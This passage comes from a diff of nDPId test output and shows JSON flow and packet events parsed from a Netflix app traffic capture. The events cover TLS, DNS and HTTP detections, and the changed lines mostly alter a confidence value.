{"version":"TLSv1.2","client_requested_server_name":"api-global.netflix.com","server_names":"api-latam.netflix.com,htmltvui.netflix.com,api-eu.netflix.com,uiboot.netflix.com,api-global.netflix.com,api-user.netflix.com,api-us.netflix.com,api.netflix.com","ja3":"d8bfad189bd26664e04570c104ee8418","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=California, L=los gatos, O=Netflix, Inc., OU=Ops, CN=api.netflix.com","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1","fingerprint":"FC:5B:F6:86:AE:E5:22:0D:60:0C:C3:DF:8F:02:80:3F:A3:60:0E:3C"}} +01019{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6789,"source":"netflix.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1484319117651,"flow_last_seen":1484319117770,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":327,"midstream":0,"thread_ts_msec":1484319117770,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.32.22.214","src_port":53248,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ios.nccp.netflix.com","ja3":"dc67ac8aaf8d7f69ecd6598135448f24","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} 
+01359{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6790,"source":"netflix.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1484319117651,"flow_last_seen":1484319117771,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":3045,"flow_avg_l4_payload_len":435,"midstream":0,"thread_ts_msec":1484319117771,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.32.22.214","src_port":53248,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ios.nccp.netflix.com","server_names":"*.nccp.netflix.com","ja3":"dc67ac8aaf8d7f69ecd6598135448f24","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"CN=Primary Certificate Authority (2009), ST=California, C=US, O=Netflix Inc, OU=Electronic Delivery, L=Los Gatos","subjectDN":"CN=*.nccp.netflix.com, O=Netflix, Inc., OU=Operations, C=US, ST=California, L=Los Gatos","fingerprint":"97:F6:63:95:8F:F2:5E:E0:80:12:5A:FD:BF:B2:EB:FE:A2:FE:72:33"}} 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6799,"source":"netflix.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319117826,"flow_last_seen":1484319117826,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319117826,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.41.30.5","src_port":53249,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6799,"source":"netflix.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":1,"flow_last_seen":1484319117826,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319117826,"pkt":"gCqoTGHM5JjWH70UCABFAABAF8hAAEAGDxPAqAEHNCkeBdABAbshc+whAAAAALAC\/\/8t3QAAAgQFtAEDAwUBAQgKH2X2iwAAAAAEAgAA"} 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6800,"source":"netflix.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319117827,"flow_last_seen":1484319117827,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319117827,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.41.30.5","src_port":53250,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6800,"source":"netflix.pcap","alias":"nDPId-test","flow_id":58,"flow_packet_id":1,"flow_last_seen":1484319117827,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319117827,"pkt":"gCqoTGHM5JjWH70UCABFAABADR1AAEAGGb7AqAEHNCkeBdACAbuRqNIFAAAAALAC\/\/\/XwQAAAgQFtAEDAwUBAQgKH2X2jAAAAAAEAgAA"} 
00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6809,"source":"netflix.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":2,"flow_last_seen":1484319117879,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319117879,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAACoGPL80KR4FwKgBBwG70AFaPMiyIXPsIqASOJC25AAAAgQFtAQCCAqh\/YpsH2X2iwEDAwg="} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6810,"source":"netflix.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":3,"flow_last_seen":1484319117881,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319117881,"pkt":"gCqoTGHM5JjWH70UCABFAAA0BiRAAEAGIMPAqAEHNCkeBdABAbshc+wiWjzIs4AQEBUN+QAAAQEICh9l9r+h\/Yps"} -00962{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6811,"source":"netflix.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319117826,"flow_last_seen":1484319117885,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":208,"flow_tot_l4_payload_len":208,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1484319117885,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.41.30.5","src_port":53249,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api-global.netflix.com","ja3":"7e72698146290dd68239f788a452e7d8","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
+00962{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6811,"source":"netflix.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319117826,"flow_last_seen":1484319117885,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":208,"flow_tot_l4_payload_len":208,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1484319117885,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.41.30.5","src_port":53249,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api-global.netflix.com","ja3":"7e72698146290dd68239f788a452e7d8","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6812,"source":"netflix.pcap","alias":"nDPId-test","flow_id":58,"flow_packet_id":2,"flow_last_seen":1484319117886,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319117886,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAACkGPb80KR4FwKgBBwG70ALhlhIJkajSBqASOJCQFwAAAgQFtAQCCAqh\/YptH2X2jAEDAwg="} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6813,"source":"netflix.pcap","alias":"nDPId-test","flow_id":58,"flow_packet_id":3,"flow_last_seen":1484319117890,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319117890,"pkt":"gCqoTGHM5JjWH70UCABFAAA0Pr9AAEAG6CfAqAEHNCkeBdACAbuRqNIG4ZYSCoAQEBXnJgAAAQEICh9l9sWh\/Ypt"} 
-00962{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6814,"source":"netflix.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319117827,"flow_last_seen":1484319117892,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":208,"flow_tot_l4_payload_len":208,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1484319117892,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.41.30.5","src_port":53250,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api-global.netflix.com","ja3":"7e72698146290dd68239f788a452e7d8","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01016{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6821,"source":"netflix.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1484319117826,"flow_last_seen":1484319117930,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":208,"flow_tot_l4_payload_len":353,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1484319117930,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.41.30.5","src_port":53249,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api-global.netflix.com","ja3":"7e72698146290dd68239f788a452e7d8","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} 
-01016{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6828,"source":"netflix.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1484319117827,"flow_last_seen":1484319117942,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":208,"flow_tot_l4_payload_len":353,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1484319117942,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.41.30.5","src_port":53250,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api-global.netflix.com","ja3":"7e72698146290dd68239f788a452e7d8","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} +00962{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6814,"source":"netflix.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319117827,"flow_last_seen":1484319117892,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":208,"flow_tot_l4_payload_len":208,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1484319117892,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.41.30.5","src_port":53250,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api-global.netflix.com","ja3":"7e72698146290dd68239f788a452e7d8","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
+01016{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6821,"source":"netflix.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1484319117826,"flow_last_seen":1484319117930,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":208,"flow_tot_l4_payload_len":353,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1484319117930,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.41.30.5","src_port":53249,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api-global.netflix.com","ja3":"7e72698146290dd68239f788a452e7d8","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} +01016{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6828,"source":"netflix.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1484319117827,"flow_last_seen":1484319117942,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":208,"flow_tot_l4_payload_len":353,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1484319117942,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.41.30.5","src_port":53250,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"api-global.netflix.com","ja3":"7e72698146290dd68239f788a452e7d8","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6888,"source":"netflix.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319118629,"flow_last_seen":1484319118629,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1484319118629,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":57093,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6888,"source":"netflix.pcap","alias":"nDPId-test","flow_id":59,"flow_packet_id":1,"flow_last_seen":1484319118629,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":81,"pkt_l4_len":47,"thread_ts_msec":1484319118629,"pkt":"gCqoTGHM5JjWH70UCABFAABDkmsAAP8RpeXAqAEHwKgBAd8FADUALzVHkfABAAABAAAAAAAABWExOTA3BGRzY2cGYWthbWFpA25ldAAAAQAB"} -00773{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6888,"source":"netflix.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319118629,"flow_last_seen":1484319118629,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1484319118629,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":57093,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": 
{"query":"a1907.dscg.akamai.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00773{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6888,"source":"netflix.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319118629,"flow_last_seen":1484319118629,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1484319118629,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":57093,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"a1907.dscg.akamai.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00533{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6895,"source":"netflix.pcap","alias":"nDPId-test","flow_id":59,"flow_packet_id":2,"flow_last_seen":1484319118652,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":113,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":113,"pkt_l4_len":79,"thread_ts_msec":1484319118652,"pkt":"5JjWH70UgCqoTGHMCABFAABj4U1AAEAR1ePAqAEBwKgBBwA13wUATx78kfCBgAABAAIAAAAABWExOTA3BGRzY2cGYWthbWFpA25ldAAAAQABwAwAAQABAAAADAAEuBnMCsAMAAEAAQAAAAwABLgZzBk="} 
-00788{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6895,"source":"netflix.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1484319118629,"flow_last_seen":1484319118652,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":71,"flow_tot_l4_payload_len":110,"flow_avg_l4_payload_len":55,"midstream":0,"thread_ts_msec":1484319118652,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":57093,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"a1907.dscg.akamai.net","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"184.25.204.10"}} +00788{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6895,"source":"netflix.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1484319118629,"flow_last_seen":1484319118652,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":71,"flow_tot_l4_payload_len":110,"flow_avg_l4_payload_len":55,"midstream":0,"thread_ts_msec":1484319118652,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":57093,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"a1907.dscg.akamai.net","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"184.25.204.10"}} 
00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6898,"source":"netflix.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319118657,"flow_last_seen":1484319118657,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319118657,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"184.25.204.10","src_port":53251,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6898,"source":"netflix.pcap","alias":"nDPId-test","flow_id":60,"flow_packet_id":1,"flow_last_seen":1484319118657,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319118657,"pkt":"gCqoTGHM5JjWH70UCABFAABAL91AAEAGxQfAqAEHuBnMCtADAFAmSxL9AAAAALAC\/\/\/OdwAAAgQFtAEDAwUBAQgKH2X5sAAAAAAEAgAA"} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6899,"source":"netflix.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319118658,"flow_last_seen":1484319118658,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319118658,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"184.25.204.10","src_port":53252,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
@@ -341,70 +341,70 @@ 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6902,"source":"netflix.pcap","alias":"nDPId-test","flow_id":60,"flow_packet_id":3,"flow_last_seen":1484319118674,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319118674,"pkt":"gCqoTGHM5JjWH70UCABFAAA0XA9AAEAGmOHAqAEHuBnMCtADAFAmSxL+8j0E\/YAQEBWcSwAAAQEICh9l+cD\/\/WqN"} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6903,"source":"netflix.pcap","alias":"nDPId-test","flow_id":61,"flow_packet_id":2,"flow_last_seen":1484319118674,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319118674,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAADwG+Mi4GcwKwKgBBwBQ0ASr4P0LxYJGIqAScSCIdgAAAgQFtAQCCAr\/\/WqNH2X5sAEDAwU="} 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6905,"source":"netflix.pcap","alias":"nDPId-test","flow_id":61,"flow_packet_id":3,"flow_last_seen":1484319118675,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319118675,"pkt":"gCqoTGHM5JjWH70UCABFAAA0us1AAEAGOiPAqAEHuBnMCtAEAFDFgkYiq+D9DIAQEBUYOwAAAQEICh9l+cH\/\/WqN"} 
-00846{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6906,"source":"netflix.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319118657,"flow_last_seen":1484319118676,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":245,"flow_tot_l4_payload_len":245,"flow_avg_l4_payload_len":61,"midstream":0,"thread_ts_msec":1484319118676,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"184.25.204.10","src_port":53251,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": {"hostname":"art-1.nflximg.net","url":"art-1.nflximg.net\/4e36d\/6289889020d6cc6dfb3038c35564a41e1ca4e36d.jpg","code":0,"content_type":"","user_agent":"Argo\/9.1.0 (iPhone; iOS 10.2; Scale\/2.00)"}} -00846{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6908,"source":"netflix.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319118658,"flow_last_seen":1484319118687,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":245,"flow_tot_l4_payload_len":245,"flow_avg_l4_payload_len":61,"midstream":0,"thread_ts_msec":1484319118687,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"184.25.204.10","src_port":53252,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": {"hostname":"art-1.nflximg.net","url":"art-1.nflximg.net\/8b1fa\/eaa1b78cd72ca4dbdcab527691d2fcab37c8b1fa.jpg","code":0,"content_type":"","user_agent":"Argo\/9.1.0 (iPhone; iOS 10.2; Scale\/2.00)"}} 
-00685{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":230,"flow_first_seen":1484319036854,"flow_last_seen":1484319110632,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":194464,"flow_avg_l4_payload_len":845,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"104.86.97.179","src_port":53141,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"}} -00641{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1484319034890,"flow_last_seen":1484319034890,"flow_idle_time":620000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"239.255.255.250","l4_proto":2,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} 